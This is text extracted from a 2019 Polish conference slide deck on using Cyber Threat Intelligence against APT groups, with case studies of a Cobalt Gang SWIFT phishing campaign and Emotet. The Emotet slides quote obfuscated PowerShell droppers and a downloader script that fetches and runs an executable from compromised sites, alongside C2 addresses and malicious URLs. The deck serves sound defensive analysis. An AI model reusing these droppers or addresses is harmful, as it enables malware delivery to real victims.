zego możemy nauczyć się od grup APT, czyli jak wykorzystać ...€¦ · Ireneusz Tarnowski IoA synteza, analiza, protekcja atrybucja Budowanie wiedzy o ataku genotyp malware, rodzina,

Czego możemy nauczyć się od grup APT,

czyli jak wykorzystać Cyber Threat Intelligence

do budowy cyberbezpieczeństwa

Ireneusz Tarnowski

Ireneusz Tarnowski, Warszawa, 22.10.2019

whoami IRENEUSZ TARNOWSKI

work :: ekspert w Zespole Analiz i Reagowania na Cyberzagrożenia Santander Bank Polska,

konsultant cyberbezpieczeństwa,

CyberSec :: analityk zagrożeń, pasjonat bezpieczeństwa komputerowego i procedur ochrony informacji

Infrastructure Architect :: projektant zorientowanych na bezpieczeństwo oraz wysokodostępnych architektur IT

sysadmin :: administrator systemów serwerowych, baz danych, usług sieciowych (pasjonat Sun/Oracle Solaris)

Member :: ISACA, Technology Risk & Information Security, IKB,

edu :: wykształcenie: Informatyka, Cyber Security Management

Prezentacja, w przeciwieństwie do wiedzy prelegenta

- nie wynika wprost z pracy w Santander Bank Polska

- nie zawiera informacji niejawnych, poufnych, TLP:RED, TLP:AMBER

- oparta jest tylko na informacjach dostępnych w otwartych źródłach (OSINT)


Czego możemy nauczyć się od grup APT …

Ireneusz Tarnowski

Cobalt Gang

Lazarus

FIN7

Fancy Bear

EMOTET

DanaBot

BackSwap

WannaCry

Petya

Trickbot

Mirai Satori

Okiru

Leafminer

Cozy Bear

TA505

URSNIF/GOZI

CYBERPRZESTRZEŃ

10 lat 6 TB international cyber criminals ……… IRIDIUM STUXNET -> detekcja 2010 rok

Norsk Hydro 19 Marca 2019

$35 million-$41 million

24 Maja 2018

Ireneusz Tarnowski

24 Maja 2018

Ireneusz Tarnowski

Ireneusz Tarnowski

From: Swift EU Subject: to complete the account creation



From: Swift EU Subject: to complete the account creation

Thank you for requesting an account on swift.com which you submitted on 21/08/2019. To complete the account creation, you must confirm your account creation by clicking on the following link: hxxps://swift-customer[.]com/FAccount_Details.img hxxps://swift-customer[.]com/Login_Details.img Once you have done so, you can follow the prompts to login, set up additional security, and register for an institution if you are requesting an account on behalf of a Customer owning a BIC. Once your account is confirmed, you may receive updates and offers related to the SWIFT products or services that you’ve purchased or use. If you do not have access to the Internet on your PC, copy the above URL to a PC where you can access the Internet. Please visit hxxps://swift-customer[.]com/ for more information about SWIFT Support services. This e-mail and any attachments thereto may contain information which is confidential and/or proprietary and are intended for the sole use of the recipient(s) named above. It is not intended to create or affect any contractual arrangements between the parties. If you have received this e-mail in error, please immediately notify your administrator and delete the e-mail. Thank you for your co-operation.



Domain: SWIFT-CUSTOMER.COM Registered: 2019-08-14 87.236.19.238 ASN: 198610 2019-08-15 104.31.79.213 ASN: 13335 (RU) 2019-08-15 104.31.78.213 ASN: 13335 (RU)

Domain Name: SWIFT-CUSTOMER.COM Registry Domain ID: 2422822025_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.beget.com Registrar URL: http://beget.com Updated Date: 2019-08-15T08:43:58Z Creation Date: 2019-08-13T09:09:09Z Registry Expiry Date: 2020-08-13T09:09:09Z Registrar: Beget LLC Registrar Abuse Contact Email: [email protected] Name Server: NITIN.NS.CLOUDFLARE.COM Name Server: ZITA.NS.CLOUDFLARE.COM DNSSEC: unsigned



http://beget.com/

mailto:[email protected]



File Name: Firefox_Update.exe File Name: Opera_Update.exe File Name: Chrome_Update.exe



MALWARE:

FAccount_Details.img a9503a000338787020af99fda4a982ec Account_Details.js 0f6b61e17b0c763ac46fd3de88ae7665 Dropped file tmp.exe PATH: C:\Users\Administrator\AppData\Local\Temp\tmp.exe Parentname: C:\Windows\SysWOW64\wscript.exe MD5sum 7eb8dd2f56c292f1b3071c8570eca791 DNS requests safestaticfirefox.com (certificate Let’s Encrypt 19.08.2019 17:50:10 GMT) HTTPS request https://safestaticfirefox[.]com/uacuxuiaeoerkaryixju Connections ip 139.28.39.70 (199.16.199.5)







vavtqlaavhdeau uacuxuiaeoerkaryixju hxxps://timeswindows[.]com Deszyfruje DLL ycD.dll i wykonuje w pamięci CobInt Malware Family

Atrybucja oparta o TTP (narzędzia, malware, sample) … bardzo wysoka pewność.



Ireneusz Tarnowski

Ireneusz Tarnowski



Identyfikacja

Prewencja/Ochrona

Detekcja

Reakcja

Odzyskiwanie

Ireneusz Tarnowski



co robimy źle?

Ireneusz Tarnowski



co robimy źle?

Ireneusz Tarnowski



Identyfikacja

Prewencja/Ochrona

Detekcja

Reakcja

Odzyskiwanie

Ireneusz Tarnowski Antycypacja



Cyber Threat Intelligence

Ireneusz Tarnowski



Poznaj swojego wroga

Ireneusz Tarnowski

Poznanie innych i poznanie siebie to zwycięstwo bez ryzyka. Poznanie otoczenia i poznanie sytuacji to zwycięstwo całkowite.

Sun Tzu Kogo się boisz, przed czym/kim budujesz obronę Poznaj swojego adwersarza Jakie techniki/taktyki stosuje Twój wróg Co wiecie o swoim wrogu Czy macie potencjał go zauważyć Czy macie potencjał się obronić Czy go szanujecie



Hackerzy - kim są?



Hackerzy - kim są?



Hackerzy - kim są?



Hackerzy - kim są?



Ireneusz Tarnowski

CYBERZAGROŻENIA - ŹRÓDŁA

grupy afiliowane przy rządach (agencje rządowe, cyberarmie, najemnicy). Takie grupy zajmują się

szpiegostwem – próbują poznać tajemnice narodowe innego kraju, czasem mają zadania

destrukcyjne wobec swoich wrogów;

terroryści wykorzystujący cyberprzestrzeń do swoich działań;

szpiedzy przemysłowi (celem jest kradzież własności intelektualnej, patentów i technologii);

zorganizowane grupy przestępcze – motywowani finansowo cyberprzestępcy, którzy swoją

działalność przenieśli w cyberprzestrzeń;

niezadowoleni pracownicy (Insider);

hakerzy – indywidualiści często z dużym potencjałem operacyjnym wykradają dane, które potem

sprzedają, zatrzymując działalność firm;

hacktywiści – kierowani ideologią hakerzy (często mniej zaawansowani), którzy najczęściej

prowadzą działania destrukcyjne i propagandowe;

konkurenci biznesowi



Ireneusz Tarnowski

CYBERZAGROŻENIA



Ireneusz Tarnowski

Modelowanie zagrożeń

Modelowanie zagrożeń to szereg działań mających na celu identyfikację i

zrozumienie zagrożeń dotyczących danego zasobu (systemu informatycznego,

aplikacji czy danych).

Modelowanie zagrożeń wspiera identyfikację i priorytetyzację środków

zaradczych oraz realizację wymogów dotyczących bezpieczeństwa, które należy

spełnić w danym środowisku (systemie informatycznym).



Ireneusz Tarnowski

Modelowanie zagrożeń

Modelowanie zagrożeń zwykle obejmuje takie aspekty jak:

identyfikacja aktywów,

opis zagrożenia, w tym opis podmiotów atakujących oraz ich techniki, taktyki i

procedury (TTP),

możliwości przeprowadzenia ataku (w ujęciu ilościowym oraz jakościowym),

związek pomiędzy zagrożeniem a aktywami organizacji,

opis założeń dotyczących bezpieczeństwa,

identyfikacja powierzchni ataku,

modelowanie zagrożeń na podstawie zebranych informacji,

ich analiza w kontekście przepływu danych lub elementów w celu umożliwienia

obserwacji wektorów ataku.



Co robić z wiedzą o zagrożeniach ?

Ireneusz Tarnowski



Co robić z wiedzą o zagrożeniach ?

Ireneusz Tarnowski

Zarządzać zagrożeniami!!!



Ireneusz Tarnowski

Threat Management



Threat Management

Ireneusz Tarnowski

Intelligence (Feed, Analysis) Mitigation Vulnerability Incident Response (Hunting) Risk Analysis Operations (SOC) Leaders



Źródła informacji

Ireneusz Tarnowski



Ireneusz Tarnowski

Firmy/organizacje specjalistyczne (FS-ISAC, CERT xx, MISPy)

Baza podatności CVE + bazy exploitów

Raporty i ostrzeżenia firm analitycznych

FireEye, TrendMicro, Symantec DeepSight, PA UNIT42, BAE, Group-IB, Proofpoint, FLashPoint, Intel471, Kaspersky, …

Analiza TTP + malware

Passive DNS, DNS reputacyjny (RisIQ, DomainTools)

informacje z serwerów C2

Darknet (+inwigilacja grup przestępczych, forów, kanałów komunikacyjnych)

Własne analizy + sandboxy + trapy + incydenty

Media, blogi, TT

Intelligence – zaufane źródło

Pasywne Aktywne



Ireneusz Tarnowski

Intelligence – IoC

Zalety: Łatwość pozyskania Łatwość implementacji

Wady : Skuteczność Pewność (przejęte domeny, stacje przesiadkowe, proxy, TOR …. ) Format (MD5/SHA1/SHA256)



Ireneusz Tarnowski

Intelligence – TTP



Ireneusz Tarnowski

Cele (Taget)

Atakujący (Attackers)

Metody (Methods)

Operacje (Operations)

Dostawcy – firmy trzecie

Podatności

Intelligence – czego oszukać



Ireneusz Tarnowski

Intelligence – narzędzia TIP



Ireneusz Tarnowski

Intelligence – narzędzia TIP

198.251.88[.]27 malware activity

Cobalt Emotet Smokeloader Quantloader Gootkit Panda Zeus



Ireneusz Tarnowski

Wzbogacanie wiedzy o atakach o kontekst

Łączenie i korelowanie informacji z wewnątrz i zewnątrz (identyfikacja i

ocena ataku)

Ocena rzeczywistego zagrożenia dla organizacji – synteza ataku

Identyfikacja False-Positive

Threat Intelligence 4 Incident Response



Ireneusz Tarnowski

IoA

synteza, analiza, protekcja

atrybucja

Budowanie wiedzy o ataku

genotyp malware, rodzina,

technika eksploitacji

technika persystencji

technika komunikacji C2

technika ukrywania się (antysandboxing) Wzbogacanie wiedzy o ataku

Threat Intelligence 4 Incident Response





MITRE ATT&CKTM



MITRE ATT&CKTM



MITRE ATT&CKTM

Threat Intelligence

Zadaniem strategii było przygotować i doprowadzić siły zbrojne (armię) do najważniejszego punktu teatru

wojny, jakim była bitwa, zaś zadaniem taktyki było w tej bitwie odnieść zwycięstwo.

Strategia Taktyka Operacja Technika



TI Taktyczny: metody ataku, narzędzia i taktyka, oparta na wystarczających zasobach

wiedza o potencjalnych atakujących (infiltracja środowiska atakującego)

TI Techniczny: wskaźniki/Identyfikatory zagrożeń (malware)

TI Operacyjny: szczegóły nadchodzących ataków, szacowanie organizacyjnych możliwości

w określaniu przyszłych zagrożeń cybernetycznych

TI Strategiczny: Informacje na wysokim poziomie o zmianie ryzyk, dokładne określenie

oceny krytycznych zagrożeń

Threat Intelligence



Ireneusz Tarnowski

Delaware, USA – August 27, 2019 – Emotet botnet like a relic monster of cyberspace has woken up and is preparing to strike a new blow. Earlier this year, the known command-and-control infrastructure of the botnet disappeared from researchers’ radars, presumably for maintenance and modification. As expected, this did not last too long

EMOTET

Active & online C2's (updated 08_29_19) 8/22/19 -------------------- 104.131.11.150:8080 104.131.208.175:8080 104.236.151.95:7080 142.93.88.16:443 144.139.247.220:80 159.89.179.87:7080 162.144.119.216:8080 162.243.125.212:8080 170.150.11.245:8080 176.31.200.130:8080 177.242.214.30:80 187.163.180.243:22 195.242.117.231:8080 216.98.148.156:8080 217.13.106.160:7080 31.12.67.62:7080 45.123.3.54:443 45.32.158.232:7080 46.101.142.115:8080 46.105.131.69:443 64.13.225.150:8080 69.45.19.145:8080 70.32.84.74:8080 75.127.14.170:8080 91.83.93.103:7080

EMOTET

EMOTET



EMOTET



EMOTET



EMOTET



EMOTET



powershell -e IAAoACAATgBlAFcALQBvAGIAagBlAGMAdAAgACAAcwBZAHMAVABlAE0ALgBJAE8ALgBjAE8AbQBQAHIAZQBTAHMASQBvAG4ALgBkAGUAZgBsAGEAVABFAHMAVAByAEUAYQBtACgAIABbAGkATwAuAE0ARQBtAE8AcgBZAFMAdAByAEUAYQBtAF0AWwBzAHkAUwBUAEUATQAuAEMATwBuAFYAZQBSAHQAXQA6ADoARgByAG8AbQBCAEEAcwBFADYANABzAFQAcgBJAE4AZwAoACgAJwBaAFoARgBoACcAKwAnAGkAOQBwACcAKwAnAEEARQBJACcAKwAnAGIALwAnACsAJwBTACcAKwAnAGoANAAnACsAJwBFACcAKwAnAFYAcgBIAHUARwBzADkAJwArACcAUwAnACsAJwB1AFIAQwA0AFMAJwArACcAWQAnACsAJwBMAEIANgA5ACcAKwAnAEYAaQBqACcAKwAnADEAQQByAEIAVgBrADMAJwArACcAWQAnACsAJwA1AEwAJwArACcATABaAGoAJwArACcAYwBrACcAKwAnAEcANgBNAG4ALwB2ACcAKAcQA3AFMAJwArACcAVQAnACsAJwAwAGwAJwArACcATgAzAGEASgBCACcAKwAnAGsAUwAnACsAJwBrAHQAZBHAGYALwBEAEEAbwAnACsAJwByAGoARQBkAHcAZABrAEcAeABQADAAJwArACcARAAnACkAKQAgACwAIABbAGkAbwAuAEMATwBtAFAAcgBFAFMAUwBJAE8ATgAuAGMATwBNAHAAcgBFAHMAUwBpAG8ATgBNAE8ARABlAF0AOgA6AEQAZQBDAG8ATQBQAHIAZQBTAFMAKQAgAHwAJQB7ACAATgBlAFcALQBvAGIAagBlAGMAdAAgAEkAbwAuAHMAdAByAGUAQQBNAHIARQBhAGQAZQBSACgAJABfACAALABbAFMAeQBTAFQAZQBtAC4AdABFAHgAVAAuAGUAbgBjAE8AZABJAE4AZwBdADoAOgBBAFMAYwBpAGkAKQAgAH0AKQAuAFIAZQBBAGQAVABPAGUATgBEACgAIAApACAAfABpAGUAWAA=

EMOTET



powershell –e &((gV('*mD'+'R*'))naME[3,11,2]-JoIN'')(NeW-ObjeCTIocoMPREsSiOnDeflATEStreAM([IomemOrYstreAm][CONvert]::frOmBAsE64STrING(('V'+'ZF'+'Ri5tAFI'+'X/yjwIk5B'+'GK1hoV4'+'S9Kp'+'WU0l0pYdNQCONkoq'+'7jXKsT3'+'SXk'+'v'+'/d2m6'+'T0Ps0MH'+'+'+'eec8bZbLI4gcCP'+'+BME0y7lofM'+'AsAaIjJqWWDwradk3Zd'+'0'+'nVS'+'S6VsaGDg'+'IkADK'+'PeGVtd'+'+d5ne'+'1wcCW27m'+'i8qV'+'s'+'O'+'RnRDhXbwfpkv3v'+'2F'+'Gqp6FO'+'2h'+'1u0b+wcU+'+'7Y23uHrj'+'elFuUetXUMbj+'+'I'+'f0jzk'+'N'+'w'+'YLMQiN5ipSG6mPezV4n8q/zE'+'B'+'QobF0R8'+'Ty9Y'+'p'+'JNJbse9vCjB53v3e6tjN+z'+'+ehM1LgLUT86G8'+'2E'+'MOa'+'Sm'+'jSCWhYxPj'+'H'+'D3R'+'/fpH'+'rHIKI'+'Z5hT/BzobQIfs'+'jh'+'yl'+'BnvjoP'+'qux4p'+'nVrwn3xxF'+'VhwV7'+'0oHh6wV0JWMwf8'+'N'+'MtTVht26'+'3'+'F+sv'+'3r'+'6dK7m+JkN'+'Ir9Z5K64u'+'/YZ'+'R'+'m'+'ZbYK'+'EzhHf'+'x'+'jt'+'sf'+'Mn'+'D1'+'Y'+'HNZ'+'pmyy5VV'+'7Q10tTKl'+'r'+'diyVCx4TzNnp5UZsVH/c'+'RQ+SRr'+'6bg65H'+'5NhH'+'hbk'+'tAnPZ'+'y'+'m'+'srE7ns/Mjhzx'+'e'+'Z8'+'Q8T'+'rCDN+g3')),[SysTEmiOcoMpRESSioNcoMpReSSionMode]::DEcOmpress)|FOreACh-obJEct{NeW-ObjeCTSYSteMIOStReaMrEADeR($_,[teXTENcoDiNG]::aSCII)})ReaDToend()

78.142.208[.]193 www.raddalmutallaga[.]com 111.67.31[.]9 lostandfoundpetsworld[.]com

EMOTET



1

2

3

4

5

6

7

8

9

1

0

1

1

1

2

1

3

$L28452='P683717';$i2109578='811';$S86178='W86878_6';$o42694=$env:

userprofile+'\'+$i2109578+'exe';$f6010414='d_4_554';

$i4851966=('ne'+'w'+'-objec'+'t')NEtW`eBCLie`NT;$R58806=

'http://daithanhtechcom/wp-includes/tlmvyggiwm_qiuyrwc-8/@

http://alvaactivewearcom/wp-admin/zic3_6ikeysj493-496935535/@

https://utahdonorsforumcom/wp-content/7n02l558tr_4l6lqd-8757/@

http://luxuriousroxycom/bqiep/trLCslfrn/@

http://mmadamechicmeushopcom/wp-admin/x79891cd_q7o212dm-21396/'

sPlIt('@');

$L7_388_1='A4180364';

foreach($B24597in$R58806){

try{$i4851966dOWNloadfilE($B24597,$o42694);$L1458255='I41931';

If((('Get-It'+'em')$o42694)LEngTH-ge32887){&('I'+'nvoke-

It'+'em')$o42694;$U_4444='Q590211';break;$Q76637='p833607'}}

catch{}}$u908_2='H_9514_'

EMOTET



Źródło: https://unit42.paloaltonetworks.com/unit42-malware-team-malspam-pushing-emotet-trickbot/

EMOTET



EMOTET



hxxp://likesmore.tk/wp-includes/6sb-r4a0q7d4-3641564300/

hxxp://wildcard.wpmudev.host/wp-admin/jo70imu-7ruxvc0ey-47307

hxxp://ks.od.ua/wp-includes/KXdkADm/

hxxp://testalmanur.kz/wp-admin/zJCcZUA/

hxxps://ashwameghmilitaryschool.in/wp-admin/s2x180u-ubl8crx-78/


hxxps://czechmagic.tk/wp-admin/x5kl-ojhm-36890/

hxxps://tpzen.vn/wp-admin/tpa-von6e-51590219/

hxxp://www.metastar.co.uk/wp-includes/z2rvgxnrs-73u-88344/

hxxps://czechmagic.tk/wp-admin/x5kl-ojhm-36890

hxxp://www.metastar.co.uk/wp-includes/z2rvgxnrs-73u-88344




hxxps://czechmagic.tk/wp-admin/x5kl-ojhm-36890/



hxxp://www.metastar.co.uk/wp-includes/z2rvgxnrs-73u-88344/


hxxp://thechainsawshack.com/wp-content/nd2iy-9lb-58945900/

Emotet Epoch 3 IOCs as of 2019-10-18 18:00 US/Eastern

źródło: https://pastebin.com/aX6ezy4E

https://gbhackers.com/trickbot-emotet-ryuk-ransomware/

EMOTET





EMOTET



Main object- "v1je27pxxzatki9uw58tib_m2r21-869536710" sha256 4ea830bc524f4854a2dfb9c6065312a1e77da0cfb944d5841916a3be1553a1b0 sha1 05f415195f042c463bb0cec36a1892521247f32c md5 809ed8ce0a2f64c99049ce54a3b4e9b7 Dropped executable file sha256 C:\Users\admin\266.exe c16b037770de8e203fd61532daf379889933d310d45d9502675c6faa3ac6ad70 DNS requests domain upeya.org domain craftlok.com domain www.ethiofidel.com Connections ip 201.184.105.242 ip 185.224.138.150 ip 166.62.28.132 ip 24.45.195.162 ip 66.96.147.145 HTTP/HTTPS requests url http://upeya.org/wp-includes/uIcbrMKbd/ url http://24.45.195.162:7080/walk/forced/add/merge/ url http://www.ethiofidel.com/cgi-bin/htt6ft2j_eh9u68dup-79/ url http://201.184.105.242:443/symbols/

IoC

EMOTET





EMOTET







https://paste.cryptolaemus.com/emotet/2019/06/10/emotet-malware-IoCs_06-10-19.html

EMOTET



TRICKBOT EMOTET


Źródło: https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/


Threat Actor ???

EMOTET



Atrybucja

Polimorficzny malware Infrastruktura C2 Infrastruktura landing-page (tysiące) Poszlaki Ryuk – Hermes Sprzedany dostęp do Infrastruktury (operator EMEA)

State - sposnored

While the link with Hermes seems to point to Grim Spider being affiliated with the former’s North Korean developers, the fact that Hermes was up for sale on Russian underground forums pokes holes in that theory.

EMOTET



ATRYBUCJA EMOTET



EMOTET



Źródło: https://www.govcert.admin.ch/downloads/whitepapers/govcertch_trickbot_analysis.pdf

EMOTET



EMOTET



EMOTET



EMOTET



Ireneusz Tarnowski

Wnioski … perspektywy

analiza zagrożeń TIA + Threat Hunting

zrozumienie TTP

badanie możliwości przeprowadzenia ataku

analiza podatności i wektorów ataku, jakie się pojawiają

działalność wywiadowcza wśród grup hackerskich

Jak się bronić? Jak wykrywać działanie malware w organizacji?

Jak rozpoznawać nowe zagrożenia? Jak budować wiedzę?

Krajobraz Zagrożeń



Ireneusz Tarnowski

[email protected]



Documents

zego możemy nauczyć się od grup APT, czyli jak wykorzystać ...€¦ · Ireneusz Tarnowski IoA synteza, analiza, protekcja atrybucja Budowanie wiedzy o ataku genotyp malware, rodzina,